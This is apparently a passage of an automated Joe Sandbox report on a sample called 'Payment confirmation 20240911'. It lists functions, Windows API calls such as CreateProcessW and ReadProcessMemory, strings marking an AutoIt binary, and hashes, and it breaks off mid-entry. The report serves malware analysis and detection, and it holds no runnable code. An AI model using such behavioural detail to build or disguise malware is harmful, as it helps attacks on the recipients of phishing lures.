                                          Similarity
                                          • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                          • String ID: <G
                                          • API String ID: 1820251861-2138716496
                                          • Opcode ID: c7d4fcc770a61729b9e64b5c26f0a9a44baed6bd4618980a4598bdc67ef6b385
                                          • Instruction ID: e8417eb6fc0731705fc63da1f4338e3486c9ac849fd0056b11522f39a5d3bd52
                                          • Opcode Fuzzy Hash: c7d4fcc770a61729b9e64b5c26f0a9a44baed6bd4618980a4598bdc67ef6b385
                                          • Instruction Fuzzy Hash: 3E11A370B0020BABDB27AFBC9C6066F3AE8AF642ACB048565D515DB2C0EB74C6519761
                                          Function 012FC955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNEL32 ref: 012FC979
                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 012FC99A
                                          • RegCloseKey.ADVAPI32(00000000), ref: 012FC9BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: Control Panel\Mouse
                                          • API String ID: 3677997916-824357125
                                          • Opcode ID: 70f5fb84c89e515b4671f1dabf79dbf5a50cc97f911c1bd98c2ca471fd887100
                                          • Instruction ID: a2053bf479de992b4aebeb2078882966b0133eec769471691ad4ea6c1fd32a88
                                          • Opcode Fuzzy Hash: 70f5fb84c89e515b4671f1dabf79dbf5a50cc97f911c1bd98c2ca471fd887100
                                          • Instruction Fuzzy Hash: 4611707562120DFFDB218FA4D844DBEBBBCEF04740F00842AE641E7110D231AE509764
                                          Function 012E131C Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012E16F2: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,012E14EB), ref: 012E1751
                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 012E159B
                                          • CoInitialize.OLE32(00000000), ref: 012E1612
                                          • CloseHandle.KERNEL32(00000000), ref: 013558F7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Handle$CloseInitializeMessageRegisterWindow
                                          • String ID: 0Bu
                                          • API String ID: 3815369404-956994742
                                          • Opcode ID: 44effd2e4397612ef240c0d3fc3d5e0594ad3a9c9c9bf3d01fb88aa0d27c0a84
                                          • Instruction ID: e3f991151d5d03308e085b3f119d9a70c9ee8ae4e62bb955d3150ddadb24269d
                                          • Opcode Fuzzy Hash: 44effd2e4397612ef240c0d3fc3d5e0594ad3a9c9c9bf3d01fb88aa0d27c0a84
                                          • Instruction Fuzzy Hash: 5B71CDB89152568FC334DF6EA194464BFFCFB69398FC8422EC05AA7299DB304408CF10
                                          Function 0132CC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012E41A7: _fseek.LIBCMT ref: 012E41BF
                                            • Part of subcall function 0132CE59: _wcscmp.LIBCMT ref: 0132CF49
                                            • Part of subcall function 0132CE59: _wcscmp.LIBCMT ref: 0132CF5C
                                          • _free.LIBCMT ref: 0132CDC9
                                          • _free.LIBCMT ref: 0132CDD0
                                          • _free.LIBCMT ref: 0132CE3B
                                            • Part of subcall function 013028CA: HeapFree.KERNEL32(00000000,00000000), ref: 013028DE
                                            • Part of subcall function 013028CA: GetLastError.KERNEL32(00000000,?,01308715,00000000,013088A3,01304673,?), ref: 013028F0
                                          • _free.LIBCMT ref: 0132CE43
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                          • String ID:
                                          • API String ID: 1552873950-0
                                          • Opcode ID: 5e0b1d4fa2683604ff57dd6fcc4c3597553859fdb5aa54563d823b3b0f935a78
                                          • Instruction ID: e754638b737d2d9793f232ba0cb70da7c810bdd84ef95b79cd1ed8b07ade0f5a
                                          • Opcode Fuzzy Hash: 5e0b1d4fa2683604ff57dd6fcc4c3597553859fdb5aa54563d823b3b0f935a78
                                          • Instruction Fuzzy Hash: 97514FB1904219AFDF15AF68CC84AAEBBB9EF58304F1040AEE61DE7290D7715A40CF59
                                          Function 012E3BFF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 01353CF1
                                          • GetOpenFileNameW.COMDLG32(?,?,00000001,013A22E8), ref: 01353D35
                                            • Part of subcall function 012E31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 012E31DA
                                            • Part of subcall function 012E3A67: SHGetMalloc.SHELL32(012E3C31), ref: 012E3A7D
                                            • Part of subcall function 012E3A67: SHGetDesktopFolder.SHELL32(?), ref: 012E3A8F
                                            • Part of subcall function 012E3A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 012E3AD2
                                            • Part of subcall function 012E3B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,013A22E8,?), ref: 012E3B65
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen_memset
                                          • String ID: X
                                          • API String ID: 3714316930-3081909835
                                          • Opcode ID: cf66ed0e6e489efc40e78c0d16d795d585938148fc2df1b0d5b6516eacf54688
                                          • Instruction ID: d18d9b4d5b8e282f4f7d8db432d509b49d092fa73c51cbeb939582c6d9f88179
                                          • Opcode Fuzzy Hash: cf66ed0e6e489efc40e78c0d16d795d585938148fc2df1b0d5b6516eacf54688
                                          • Instruction Fuzzy Hash: 4611CAB1A10289ABCF05DFE8D8496EE7BFDBF55705F40800DE501BB341DBB585498BA1
                                          Function 0132D009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTempPathW.KERNEL32(00000104,?), ref: 0132D01E
                                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0132D035
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Temp$FileNamePath
                                          • String ID: aut
                                          • API String ID: 3285503233-3010740371
                                          • Opcode ID: 1cf29d09ef242672dcd6a31b07762b2d4ff3d9a43c724d2baca0cf0936e4fc06
                                          • Instruction ID: c7bd0468752dbd870efc2623de6eb6f89fb7fd0a5926a98a082d53a535721db0
                                          • Opcode Fuzzy Hash: 1cf29d09ef242672dcd6a31b07762b2d4ff3d9a43c724d2baca0cf0936e4fc06
                                          • Instruction Fuzzy Hash: 1CD05EB164030EBBDB20ABA0ED0EF99776CA704708F108190B655D10D1D2B0D5458BA0
                                          Function 002612A0 Relevance: 5.2, APIs: 3, Instructions: 720processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessW.KERNEL32(?,00000000), ref: 00261A5B
                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00261B13
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350512103.0000000000260000.00000040.00001000.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_260000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Process$CreateMemoryRead
                                          • String ID:
                                          • API String ID: 2726527582-0
                                          • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                          • Instruction ID: 70b291624b569d7714abb1e02eb564304d61bf2c8208d42a6a04f690de3c893c
                                          • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                          • Instruction Fuzzy Hash: E6621D30A24258DBEB24CFA4C851BDEB372EF58300F1491A9D50DEB390E7769E91CB59
                                          Function 0133F79F Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2ccde105ef3491ab5f9299e6cae6f7c14c82e55179c7478fbe7fee75e869b12b
                                          • Instruction ID: 9d842c4ecdc01694e7409092da7209e4e6b2c7fbce3988c225f0ed0986d6ce8f
                                          • Opcode Fuzzy Hash: 2ccde105ef3491ab5f9299e6cae6f7c14c82e55179c7478fbe7fee75e869b12b
                                          • Instruction Fuzzy Hash: C1F17C71A047069FCB14DF28C584B6ABBE5FFC8318F50892DE9999B291D730E945CF82
                                          Function 012E3A67 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                          Download Yara Rule
                                          APIs
                                          • SHGetMalloc.SHELL32(012E3C31), ref: 012E3A7D
                                          • SHGetPathFromIDListW.SHELL32(?,?), ref: 012E3AD2
                                          • SHGetDesktopFolder.SHELL32(?), ref: 012E3A8F
                                            • Part of subcall function 012E3B1E: _wcsncpy.LIBCMT ref: 012E3B32
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                          • String ID:
                                          • API String ID: 3981382179-0
                                          • Opcode ID: d3bd7da5c2c6a6647101c0dc78dd208409bc653fc3d23c76b36377bc3dc5b980
                                          • Instruction ID: ad074c80a866c1af5b2a23829e85fe9155eabec9cd6e073e3c32612a4d6bc849
                                          • Opcode Fuzzy Hash: d3bd7da5c2c6a6647101c0dc78dd208409bc653fc3d23c76b36377bc3dc5b980
                                          • Instruction Fuzzy Hash: 74218376B00114ABDB15DF99D888DEE77BDEF88701B404098F50AD7254EB309E45CBA0
                                          Function 012E3598 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 012E35BE
                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 012E3667
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell__memset
                                          • String ID:
                                          • API String ID: 928536360-0
                                          • Opcode ID: ea63cc7cd9187c008de33a0311507e598f39524a3d8c61197f745e09ba2627d9
                                          • Instruction ID: 07fa527c288a2ad5fcca346797fb885c47eaee037ff2979e37d84d860c848d31
                                          • Opcode Fuzzy Hash: ea63cc7cd9187c008de33a0311507e598f39524a3d8c61197f745e09ba2627d9
                                          • Instruction Fuzzy Hash: 46318CB06143019FD732DF38D449697BBE8FB49309F40092EE69A83240E771A548CB56
                                          Function 013045EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __FF_MSGBANNER.LIBCMT ref: 01304603
                                            • Part of subcall function 01308E52: __NMSG_WRITE.LIBCMT ref: 01308E79
                                            • Part of subcall function 01308E52: __NMSG_WRITE.LIBCMT ref: 01308E83
                                          • __NMSG_WRITE.LIBCMT ref: 0130460A
                                            • Part of subcall function 01308EB2: GetModuleFileNameW.KERNEL32(00000000,013A0312,00000104,?,00000001,01300127), ref: 01308F44
                                            • Part of subcall function 01308EB2: ___crtMessageBoxW.LIBCMT ref: 01308FF2
                                            • Part of subcall function 01301D65: ___crtCorExitProcess.LIBCMT ref: 01301D6B
                                            • Part of subcall function 01301D65: ExitProcess.KERNEL32 ref: 01301D74
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          • RtlAllocateHeap.NTDLL(00720000,00000000,00000001,?,?,?,?,01300127,?,012E125D,00000058,?,?), ref: 0130462F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                          • String ID:
                                          • API String ID: 1372826849-0
                                          • Opcode ID: 754d269c710d38e9263c58dcd0a8a75113320c45f9b74cd0c1c94c66a402b495
                                          • Instruction ID: bde9323f20b1d2dda7c43bb117a415bd42329da044db95f813442317990f1b48
                                          • Opcode Fuzzy Hash: 754d269c710d38e9263c58dcd0a8a75113320c45f9b74cd0c1c94c66a402b495
                                          • Instruction Fuzzy Hash: BB019231A0171AEAE6277B7CAC70A2B27CCAB8177DF010129E7059B1C4EBB099418665
                                          Function 0132CFC8 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 0132CFE1
                                          • SetFileTime.KERNEL32(00000000,?,00000000,?,?,0132CC71,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0132CFF7
                                          • CloseHandle.KERNEL32(00000000), ref: 0132CFFE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateHandleTime
                                          • String ID:
                                          • API String ID: 3397143404-0
                                          • Opcode ID: b0a76b854280e9ae42aa8e326aa274e43dc07e6cc5bc09ddeae8d121ac7c97c3
                                          • Instruction ID: e9098b21253709de5876763f7a4e2f16961a88c5a0db53734e28a698ff2bef6b
                                          • Opcode Fuzzy Hash: b0a76b854280e9ae42aa8e326aa274e43dc07e6cc5bc09ddeae8d121ac7c97c3
                                          • Instruction Fuzzy Hash: 1AE0E632241224F7E7712B94AC0AFCA7F5DAB05775F108110FB55690E087F565519798
                                          Function 012F058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CALL
                                          • API String ID: 0-4196123274
                                          • Opcode ID: ec2db3c1af6e5d10d2b32ffa633fb83f96f38442dc04bafdac00da5d9209abe2
                                          • Instruction ID: 3c1538aacd48b69c91f779ae213fe903fa1bc3db56ae60850af5346cc50506e0
                                          • Opcode Fuzzy Hash: ec2db3c1af6e5d10d2b32ffa633fb83f96f38442dc04bafdac00da5d9209abe2
                                          • Instruction Fuzzy Hash: F1225F74518242CFD729DF18C494A2AFBE2BF84304F15896DFA9A8B362D771E845CB42
                                          Function 012E4010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: EA06
                                          • API String ID: 4104443479-3962188686
                                          • Opcode ID: 19161941226f760118f32cca43f54f1f8c0c10dd97c88644f076552d78eb398a
                                          • Instruction ID: 9e57fc5500f62acfb6b33c3f52c4d46e703591c743d8053ec7d30add604cec44
                                          • Opcode Fuzzy Hash: 19161941226f760118f32cca43f54f1f8c0c10dd97c88644f076552d78eb398a
                                          • Instruction Fuzzy Hash: C1419E21B241D597DF15BB58C86D7BE7FE18B15200FD84474DA82EF182C621DA4487A1
                                          Function 012E34C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                          Download Yara Rule
                                          Strings
                                          • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 013534AA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                          • API String ID: 1029625771-2684727018
                                          • Opcode ID: 1e6e191e932b9e07115203ff8cb9ca1d800b6079d9b6a1403505a107db43e8c8
                                          • Instruction ID: 3aa15987ccd8be9b990c962508309eed9e5b5056692c3c32e631d33c210fdffb
                                          • Opcode Fuzzy Hash: 1e6e191e932b9e07115203ff8cb9ca1d800b6079d9b6a1403505a107db43e8c8
                                          • Instruction Fuzzy Hash: 19F0687591020EAEDF11FFB5D855CFFBBF8BE20204B548526E81593181EB749A09CB20
                                          Function 013035E7 Relevance: 3.1, APIs: 2, Instructions: 135COMMON
                                          Download Yara Rule
                                          APIs
                                          • _memmove.LIBCMT ref: 0130367B
                                          • __flush.LIBCMT ref: 0130369B
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __flush__getptd_noexit_memmove
                                          • String ID:
                                          • API String ID: 3662107617-0
                                          • Opcode ID: b72b96f0b08a5dd7c821446d6f61356e274207c67f1561640341e108c062a208
                                          • Instruction ID: f1d91d0e432c7a2694787d874caa0be422bea0e0e78e4e3b928dca7097f41043
                                          • Opcode Fuzzy Hash: b72b96f0b08a5dd7c821446d6f61356e274207c67f1561640341e108c062a208
                                          • Instruction Fuzzy Hash: 5F41A07570060AAFEB1B8EADC8E05AEBBE5BF54278B14852DE945C77C0DB70DA408B40
                                          Function 01309AF3 Relevance: 3.1, APIs: 2, Instructions: 127COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          • __getbuf.LIBCMT ref: 01309B8A
                                          • __lseeki64.LIBCMT ref: 01309BFA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __getbuf__getptd_noexit__lseeki64
                                          • String ID:
                                          • API String ID: 3311320906-0
                                          • Opcode ID: 8432ee11c9dbfe2525293381bd722ae6be32ba61f264e299af874a0231fa6605
                                          • Instruction ID: 2c88de1528971a2f204bfa1257f38fdeced8658fd73be584fbd5a97e715d46d2
                                          • Opcode Fuzzy Hash: 8432ee11c9dbfe2525293381bd722ae6be32ba61f264e299af874a0231fa6605
                                          • Instruction Fuzzy Hash: 6941A171900B069EE73A9B2CC8B0B7A7BD8AB4533CF04C61DE5AE8B6D2D774D4408B51
                                          Function 012EBBD9 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
